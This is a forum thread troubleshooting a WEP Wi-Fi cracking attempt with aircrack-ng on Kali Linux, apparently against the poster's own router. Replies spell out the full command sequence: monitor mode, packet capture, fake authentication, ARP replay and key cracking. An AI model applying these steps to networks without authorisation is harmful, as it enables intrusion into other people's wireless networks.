Thread: troubleshooting aircrack-ng

  1. #1
    Join Date
    2013-May
    Posts
    7

    troubleshooting aircrack-ng

    Hello all, I've got a WEP wireless network configured in the kitchen and I'm trying to break it in my bedroom.

    I'm using Kali Linux and an Alfa AWUS036NHR card.

    I've seen more than 20 different tutorials but with no luck.

    As you can see here:
    http://imageshack.com/a/img23/1829/oytr.jpg

    Any thoughts on what I am doing wrong?

    Steps used:
    airmon-ng start wlan0
    airodump-ng mon0
    airodump-ng -w wep -c 6 --bssid 00:1F:C6:F4:44:11 mon0 (mac address of my router)

    (other window)
    aireplay-ng -1 0 -a 00:1F:C6:F4:44:11 mon0
    aireplay-ng -3 -b 00:1F:C6:F4:44:11 mon0

    (other window)
    aircrack-ng wep-01.cap
    I've tried with more than 25000 IVs and got no luck.

  2. #2
    You are missing a client MAC. It can't get a handshake if there is no client.
    Where is the darn "any key" key?

  3. #3
    Join Date
    2013-May
    Posts
    7
    Quote, originally posted by thepoor:
    You are missing a client MAC. It can't get a handshake if there is no client.

    In the aireplay commands?

    Should be
    aireplay-ng -1 0 -a 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0
    aireplay-ng -3 -b 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0

    Where -h is the MAC of the connected client?

    Thank you

  4. #4
    Join Date
    2013-Mar
    Posts
    354
    Agree with thepoor.
    You are missing some parameters (Alfa USB) in aireplay-ng... You should refer to the aircrack-ng home page.

  5. #5
    Join Date
    2013-May
    Posts
    7
    Quote, originally posted by maverik35:
    Agree with thepoor.
    You are missing some parameters (Alfa USB) in aireplay-ng... You should refer to the aircrack-ng home page.

    Which parameters are you talking about?!
    I've seen a bunch of tutorials and no one told me about them.

    Are you talking about this?!
    Step 4 - Use aireplay-ng to do a fake authentication with the access point

    In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

    The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client.

    To associate with an access point, use fake authentication:

    aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
    Where:

    -1 means fake authentication
    0 reassociation timing in seconds
    -e teddy is the wireless network name
    -a 00:14:6C:7E:40:80 is the access point MAC address
    -h 00:0F:B5:88:AC:82 is our card MAC address
    ath0 is the wireless interface name

    Thank you

  6. #6
    Join Date
    2014-Feb
    Posts
    3
    I've been able to crack WEP many times with no associated clients after some trial and error. You need to fake authenticate first:
    1. aireplay-ng -1 0 -a 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0
       If this doesn't work, then try:
       aireplay-ng -1 6000 -o 1 -q 10 -a 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0
       If the first command doesn't authenticate, the second one usually works. You might need to try it 2-3 times before it works.
    2. aireplay-ng -3 -b 00:1F:C6:F4:44:11 -h 00:04:05:06:07:08 mon0
       Just let this run; sometimes it takes 30 seconds for the ARP requests to start working.
    3. Once you start getting ARP requests, just let it run until aircrack cracks it.
    When I am attacking WEP I usually use airodump-ng --ivs -w filename -c # --bssid so the aircrack-ng command would be:
    aircrack-ng filename*.ivs filename*.cap

  7. #7
    Join Date
    2013-May
    Posts
    7
    I'll give it a try and then let you know. Cheers!
